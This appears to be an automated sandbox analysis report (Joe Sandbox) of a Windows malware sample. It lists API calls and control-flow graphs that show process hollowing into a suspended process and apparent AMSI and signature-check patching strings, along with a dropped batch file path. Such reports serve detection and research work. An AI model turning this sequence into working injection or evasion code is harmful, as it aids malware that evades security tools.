2d784c0-2d787e6 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d62ee0 call 2d62f08 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 GetThreadContext 9764->9871 9872 2d7844f-2d784bb call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 9764->9872 9871->9720 9980 2d787ec-2d78a4f call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 NtReadVirtualMemory 9871->9980 9872->9871 10051 2d78a55-2d78bbe call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 NtUnmapViewOfSection 9980->10051 10052 2d78d5c-2d78dc7 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 9980->10052 10138 2d78bc0-2d78be6 call 2d77968 10051->10138 10139 2d78be8-2d78c53 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 10051->10139 10078 2d78dcd-2d78f4d call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d77968 10052->10078 10079 2d78dc8 call 2d77be8 10052->10079 10078->9720 10183 2d78f53-2d7904c call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d77e58 10078->10183 10079->10078 10148 2d78c59-2d78d5a call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d77968 10138->10148 10139->10148 10179 2d78c54 call 2d77be8 10139->10179 10148->10078 10179->10148 10232 2d790a0-2d799a6 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 NtWriteVirtualMemory call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 NtWriteVirtualMemory call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 SetThreadContext NtResumeThread call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d62c2c call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d77ac0 * 3 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d77ac0 * 2 call 2d64824 call 2d64964 call 2d647b0 call 2d64964 call 2d77ac0 call 2d64824 call 2d64964 call 2d647b0 call 2d64964 call 2d77ac0 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 10183->10232 10233 2d7904e-2d7909b call 2d77d50 call 2d77d44 10183->10233 10232->9720 10233->10232
                                                                                        APIs
                                                                                          • Part of subcall function 02D77BE8: LoadLibraryW.KERNEL32(?,00000000,02D77C9A), ref: 02D77C18
                                                                                          • Part of subcall function 02D77BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02D77C9A), ref: 02D77C1E
                                                                                          • Part of subcall function 02D77BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02D77C37
                                                                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02DC5398,02DC5388,OpenSession,02DC5360,02D79A30,ScanString,02DC5360), ref: 02D78446
                                                                                        • GetThreadContext.KERNEL32(00000870,02DC53DC,ScanString,02DC5360,02D79A30,UacInitialize,02DC5360,02D79A30,ScanBuffer,02DC5360,02D79A30,ScanBuffer,02DC5360,02D79A30,UacInitialize,02DC5360), ref: 02D787DF
                                                                                        • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000087C,002CCFF8,02DC54B0,00000004,02DC54B8,ScanBuffer,02DC5360,02D79A30,ScanString,02DC5360,02D79A30,Initialize,02DC5360,02D79A30,UacScan,02DC5360), ref: 02D78A3C
                                                                                        • NtUnmapViewOfSection.N(0000087C,00400000,ScanBuffer,02DC5360,02D79A30,ScanString,02DC5360,02D79A30,Initialize,02DC5360,02D79A30,0000087C,002CCFF8,02DC54B0,00000004,02DC54B8), ref: 02D78BB7
                                                                                          • Part of subcall function 02D77968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02D77975
                                                                                          • Part of subcall function 02D77968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02D7797B
                                                                                          • Part of subcall function 02D77968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D7799B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressHandleMemoryModuleProcVirtual$AllocateContextCreateLibraryLoadProcessReadSectionThreadUnmapUserView
                                                                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc$IC
                                                                                        • API String ID: 3979268988-3678116285
                                                                                        • Opcode ID: 1439d0662a75054c79658631bd8e7eb8d8945f84aabd3be3042b982d857c1145
                                                                                        • Instruction ID: 4195801a1987daf057053832354dc44a2604602337da0afbad2f29db36940283
                                                                                        • Opcode Fuzzy Hash: 1439d0662a75054c79658631bd8e7eb8d8945f84aabd3be3042b982d857c1145
                                                                                        • Instruction Fuzzy Hash: 91E22F31A411699FEB21EBA0DC94BEE73B6EF45700F1045A6E009BB314EE74AE45CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D65A90 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 10506 2d65a90-2d65ad1 GetModuleFileNameA RegOpenKeyExA 10507 2d65b13-2d65b56 call 2d658cc RegQueryValueExA 10506->10507 10508 2d65ad3-2d65aef RegOpenKeyExA 10506->10508 10515 2d65b7a-2d65b94 RegCloseKey 10507->10515 10516 2d65b58-2d65b74 RegQueryValueExA 10507->10516 10508->10507 10509 2d65af1-2d65b0d RegOpenKeyExA 10508->10509 10509->10507 10511 2d65b9c-2d65bcd lstrcpynA GetThreadLocale GetLocaleInfoA 10509->10511 10513 2d65cb6-2d65cbd 10511->10513 10514 2d65bd3-2d65bd7 10511->10514 10517 2d65be3-2d65bf9 lstrlenA 10514->10517 10518 2d65bd9-2d65bdd 10514->10518 10516->10515 10519 2d65b76 10516->10519 10521 2d65bfc-2d65bff 10517->10521 10518->10513 10518->10517 10519->10515 10522 2d65c01-2d65c09 10521->10522 10523 2d65c0b-2d65c13 10521->10523 10522->10523 10524 2d65bfb 10522->10524 10523->10513 10525 2d65c19-2d65c1e 10523->10525 10524->10521 10526 2d65c20-2d65c46 lstrcpynA LoadLibraryExA 10525->10526 10527 2d65c48-2d65c4a 10525->10527 10526->10527 10527->10513 10528 2d65c4c-2d65c50 10527->10528 10528->10513 10529 2d65c52-2d65c82 lstrcpynA LoadLibraryExA 10528->10529 10529->10513 10530 2d65c84-2d65cb4 lstrcpynA LoadLibraryExA 10529->10530 10530->10513
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02D60000,02D8B790), ref: 02D65AAC
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D60000,02D8B790), ref: 02D65ACA
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D60000,02D8B790), ref: 02D65AE8
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02D65B06
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02D65B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02D65B4F
                                                                                        • RegQueryValueExA.ADVAPI32(?,02D65CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02D65B95,?,80000001), ref: 02D65B6D
                                                                                        • RegCloseKey.ADVAPI32(?,02D65B9C,00000000,?,?,00000000,02D65B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02D65B8F
                                                                                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02D65BAC
                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02D65BB9
                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02D65BBF
                                                                                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02D65BEA
                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D65C31
                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D65C41
                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D65C69
                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D65C79
                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02D65C9F
                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02D65CAF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                        • API String ID: 1759228003-2375825460
                                                                                        • Opcode ID: 1d57a02b5b4aaeba92be0ceb3202deeed7289e675d5857e7a061eafed4101763
                                                                                        • Instruction ID: 8d3f82cfec7bbbe01f4780a405a260ec23c1a6316923526aa36c4d2f9a426197
                                                                                        • Opcode Fuzzy Hash: 1d57a02b5b4aaeba92be0ceb3202deeed7289e675d5857e7a061eafed4101763
                                                                                        • Instruction Fuzzy Hash: E1514FB1A4020D6BFB21D6A4DC4AFFE77ADDB08744F8041A1A604E6381E674DE84CF64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D7CA6C Relevance: 17.9, APIs: 4, Strings: 6, Instructions: 400processsynchronizationCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 12240 2d7ca6c-2d7ca70 12241 2d7ca75-2d7ca7a 12240->12241 12241->12241 12242 2d7ca7c-2d7cf2f call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64704 * 2 call 2d64824 call 2d6473c call 2d63098 call 2d64698 * 2 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64704 call 2d67ee8 call 2d64964 call 2d64d38 call 2d64db4 call 2d64704 call 2d64964 call 2d64d38 call 2d64db4 CreateProcessAsUserW call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 12241->12242 12403 2d7cf35-2d7d035 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 WaitForSingleObject CloseHandle * 2 12242->12403 12404 2d7d03a-2d7d087 call 2d644c4 call 2d64c24 call 2d644c4 call 2d64c24 call 2d644c4 12242->12404 12403->12404
                                                                                        APIs
                                                                                          • Part of subcall function 02D77BE8: LoadLibraryW.KERNEL32(?,00000000,02D77C9A), ref: 02D77C18
                                                                                          • Part of subcall function 02D77BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02D77C9A), ref: 02D77C1E
                                                                                          • Part of subcall function 02D77BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02D77C37
                                                                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,02DC5644,02DC5688,ScanString,02DC5344,02D7D0A4,OpenSession,02DC5344), ref: 02D7CDD3
                                                                                        • WaitForSingleObject.KERNEL32(00000860,000000FF,ScanString,02DC5344,02D7D0A4,OpenSession,02DC5344,02D7D0A4,ScanString,02DC5344,02D7D0A4,OpenSession,02DC5344,02D7D0A4,UacScan,02DC5344), ref: 02D7D01F
                                                                                        • CloseHandle.KERNEL32(00000860,00000860,000000FF,ScanString,02DC5344,02D7D0A4,OpenSession,02DC5344,02D7D0A4,ScanString,02DC5344,02D7D0A4,OpenSession,02DC5344,02D7D0A4,UacScan), ref: 02D7D02A
                                                                                        • CloseHandle.KERNEL32(000005E4,00000860,00000860,000000FF,ScanString,02DC5344,02D7D0A4,OpenSession,02DC5344,02D7D0A4,ScanString,02DC5344,02D7D0A4,OpenSession,02DC5344,02D7D0A4), ref: 02D7D035
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Handle$Close$AddressCreateLibraryLoadModuleObjectProcProcessSingleUserWait
                                                                                        • String ID: *"C:\Users\Public\Libraries\XjfxsfmnO.bat" $Amsi$AmsiOpenSession$OpenSession$ScanString$UacScan
                                                                                        • API String ID: 1205125484-3278934373
                                                                                        • Opcode ID: 04b818dc3055aecf67f7ff456ed3c64cde8124a070495a1deb704635bc4ba14a
                                                                                        • Instruction ID: ccd81ae1f4cbbe1347aa1440ef014536393f85ef423bdc3e8406033378dfd0e1
                                                                                        • Opcode Fuzzy Hash: 04b818dc3055aecf67f7ff456ed3c64cde8124a070495a1deb704635bc4ba14a
                                                                                        • Instruction Fuzzy Hash: 1CF1EE34A401599FEB20FBA4D884BEE73B7EF85700F608566E108BB354DB74AD468F61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D77AC0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40librarynativeloaderCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 12444 2d77ac0-2d77adb LoadLibraryW 12445 2d77add-2d77ae6 GetProcAddress 12444->12445 12446 2d77b0a-2d77b12 12444->12446 12447 2d77b04-2d77b05 FreeLibrary 12445->12447 12448 2d77ae8-2d77b00 NtWriteVirtualMemory 12445->12448 12447->12446 12448->12447 12449 2d77b02 12448->12449 12449->12447
                                                                                        APIs
                                                                                        • LoadLibraryW.KERNEL32(bcrypt,02D79A30,Initialize,02DC5360,02D79A30,UacScan,02DC5360,02D79A30,UacInitialize,02DC5360,02D79A30,00000870,02DC53DC,ScanString,02DC5360,02D79A30), ref: 02D77AD2
                                                                                        • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D77ADF
                                                                                        • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000087C,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,02D79A30,Initialize,02DC5360,02D79A30,UacScan,02DC5360,02D79A30,UacInitialize), ref: 02D77AF6
                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,02D79A30,Initialize,02DC5360,02D79A30,UacScan,02DC5360,02D79A30,UacInitialize,02DC5360,02D79A30,00000870,02DC53DC), ref: 02D77B05
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                        • String ID: BCryptVerifySignature$bcrypt
                                                                                        • API String ID: 1002360270-4067648912
                                                                                        • Opcode ID: ad32a12dd2a313207f2abf6604a44fcdea95e0bf229231ac431631d10f8221b9
                                                                                        • Instruction ID: f4ae16c2b72f0d90a987651b397b3c057fa568fc8d5916a94cc6abc78e4cab5a
                                                                                        • Opcode Fuzzy Hash: ad32a12dd2a313207f2abf6604a44fcdea95e0bf229231ac431631d10f8221b9
                                                                                        • Instruction Fuzzy Hash: A1F0E27260A3543EE221A1685C84EBFA29DCBC27A0F404A6DF55496380EB69CC04C3F2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D77966 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24librarymemorynativeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02D77975
                                                                                        • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02D7797B
                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D7799B
                                                                                        Strings
                                                                                        • C:\Windows\System32\ntdll.dll, xrefs: 02D77970
                                                                                        • NtAllocateVirtualMemory, xrefs: 02D7796B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                        • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                        • API String ID: 421316089-2206134580
                                                                                        • Opcode ID: d54ec32f136a03ce1ddf6ef2f4846a6a233c50e85c76b4f3fa4345f1c8f6a02f
                                                                                        • Instruction ID: adc3b80cbd31bde4d244a5d2f5379926d882fc79f7e8a342e4fc99d76c893ea6
                                                                                        • Opcode Fuzzy Hash: d54ec32f136a03ce1ddf6ef2f4846a6a233c50e85c76b4f3fa4345f1c8f6a02f
                                                                                        • Instruction Fuzzy Hash: E7E0E5B2640209BFEB00DEA8E845EEB77ACEB08610F404412BA09D7200E774ED108BB5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D77968 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23librarymemorynativeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02D77975
                                                                                        • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02D7797B
                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D7799B
                                                                                        Strings
                                                                                        • C:\Windows\System32\ntdll.dll, xrefs: 02D77970
                                                                                        • NtAllocateVirtualMemory, xrefs: 02D7796B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                        • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                        • API String ID: 421316089-2206134580
                                                                                        • Opcode ID: 608cf7b03bf3f743939e1ec53dd90492b625869a64a9c0445bdf353ef5417d6a
                                                                                        • Instruction ID: 67cf424bb0e73d29cb49fd1b022b1d9a8766afcc8f160a9ed8a55f50dc2c6460
                                                                                        • Opcode Fuzzy Hash: 608cf7b03bf3f743939e1ec53dd90492b625869a64a9c0445bdf353ef5417d6a
                                                                                        • Instruction Fuzzy Hash: 31E01AB254020DBFEB00DEA8E845EDB77ACEB08610F404412BA09D7300E774ED108BF5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D7C4DC Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 02D64EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02D64EF2
                                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D7C5AC), ref: 02D7C517
                                                                                        • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02D7C5AC), ref: 02D7C547
                                                                                        • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02D7C55C
                                                                                        • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02D7C588
                                                                                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02D7C591
                                                                                          • Part of subcall function 02D64C24: SysFreeString.OLEAUT32(02D7D42C), ref: 02D64C32
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                        • String ID:
                                                                                        • API String ID: 1897104825-0
                                                                                        • Opcode ID: 1615ad2738c753df73c1542e656a77de04b7cb8b46019d8efdd371f47540b714
                                                                                        • Instruction ID: e0bc1a77204fffc4be9780fa9ce87e45174f51d5263d1667663b2dda28a14790
                                                                                        • Opcode Fuzzy Hash: 1615ad2738c753df73c1542e656a77de04b7cb8b46019d8efdd371f47540b714
                                                                                        • Instruction Fuzzy Hash: 3F219575A50308BBEB11EA94CC56FEEB7BDEB08700F500466B600E72C0EA74AE458B65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D7C8AC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D7C9EA
                                                                                        Strings
                                                                                        Memory Dump Source
